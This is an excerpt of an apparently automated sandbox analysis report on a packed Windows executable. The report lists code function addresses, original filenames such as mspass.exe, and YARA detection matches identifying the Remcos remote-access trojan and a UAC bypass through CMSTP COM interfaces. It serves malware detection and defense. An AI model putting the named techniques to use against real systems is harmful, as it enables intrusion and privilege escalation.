                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F16900_2_044F1690
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F12580_2_044F1258
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F1F000_2_044F1F00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F3A480_2_044F3A48
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F1AC80_2_044F1AC8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05065D700_2_05065D70
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_050684280_2_05068428
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_050690D80_2_050690D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05065D610_2_05065D61
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0506AC000_2_0506AC00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0506AC100_2_0506AC10
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05067F680_2_05067F68
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0506A9720_2_0506A972
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0506A9800_2_0506A980
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05067B300_2_05067B30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05064A910_2_05064A91
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05064AA00_2_05064AA0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_100171949_2_10017194
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_1000B5C19_2_1000B5C1
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_031BDE0C10_2_031BDE0C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_0531169010_2_05311690
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_0531125810_2_05311258
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05311F0010_2_05311F00
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05313A3710_2_05313A37
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05313A4810_2_05313A48
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05311AC810_2_05311AC8
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05906C1010_2_05906C10
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_0590000710_2_05900007
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_0590004010_2_05900040
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_05906C0110_2_05906C01
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D5D7010_2_077D5D70
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DCD9810_2_077DCD98
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D4AA010_2_077D4AA0
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D842810_2_077D8428
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D90D810_2_077D90D8
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D7F6810_2_077D7F68
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D5D6110_2_077D5D61
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DCD6010_2_077DCD60
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DAC1010_2_077DAC10
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DAC0A10_2_077DAC0A
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D7B3010_2_077D7B30
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D4A9110_2_077D4A91
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DA97110_2_077DA971
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077DA98010_2_077DA980
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0043706A15_2_0043706A
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041400515_2_00414005
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0043E11C15_2_0043E11C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004541D915_2_004541D9
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004381E815_2_004381E8
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041F18B15_2_0041F18B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0044627015_2_00446270
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0043E34B15_2_0043E34B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004533AB15_2_004533AB
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0042742E15_2_0042742E
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0043756615_2_00437566
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0043E5A815_2_0043E5A8
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004387F015_2_004387F0
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0043797E15_2_0043797E
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004339D715_2_004339D7
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0044DA4915_2_0044DA49
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00427AD715_2_00427AD7
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041DBF315_2_0041DBF3
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00427C4015_2_00427C40
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00437DB315_2_00437DB3
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00435EEB15_2_00435EEB
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0043DEED15_2_0043DEED
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00426E9F15_2_00426E9F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044B04017_2_0044B040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0043610D17_2_0043610D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044731017_2_00447310
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044A49017_2_0044A490
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0040755A17_2_0040755A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0043C56017_2_0043C560
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044B61017_2_0044B610
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044D6C017_2_0044D6C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_004476F017_2_004476F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044B87017_2_0044B870
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044081D17_2_0044081D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0041495717_2_00414957
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_004079EE17_2_004079EE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00407AEB17_2_00407AEB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044AA8017_2_0044AA80
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00412AA917_2_00412AA9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00404B7417_2_00404B74
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00404B0317_2_00404B03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044BBD817_2_0044BBD8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00404BE517_2_00404BE5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00404C7617_2_00404C76
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00415CFE17_2_00415CFE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00416D7217_2_00416D72
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00446D3017_2_00446D30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00446D8B17_2_00446D8B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00406E8F17_2_00406E8F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0040503819_2_00405038
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0041208C19_2_0041208C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_004050A919_2_004050A9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0040511A19_2_0040511A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0043C13A19_2_0043C13A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_004051AB19_2_004051AB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0044930019_2_00449300
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0040D32219_2_0040D322
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0044A4F019_2_0044A4F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0043A5AB19_2_0043A5AB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0041363119_2_00413631
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0044669019_2_00446690
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0044A73019_2_0044A730
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_004398D819_2_004398D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_004498E019_2_004498E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0044A88619_2_0044A886
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0043DA0919_2_0043DA09
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00438D5E19_2_00438D5E
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00449ED019_2_00449ED0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0041FE8319_2_0041FE83
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00430F5419_2_00430F54
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_004050C220_2_004050C2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_004014AB20_2_004014AB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_0040513320_2_00405133
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_004051A420_2_004051A4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_0040124620_2_00401246
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_0040CA4620_2_0040CA46
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_0040523520_2_00405235
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_004032C820_2_004032C8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_0040168920_2_00401689
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00402F6020_2_00402F60
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: String function: 00416760 appears 69 times
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: invalid certificate
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2087494632.000000000B4B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000000.2023056656.0000000000142000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejfwY.exeX vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2077682525.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4488091331.0000000001221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeBinary or memory string: OriginalFileName vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeBinary or memory string: OriginalFilenamejfwY.exeX vs SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
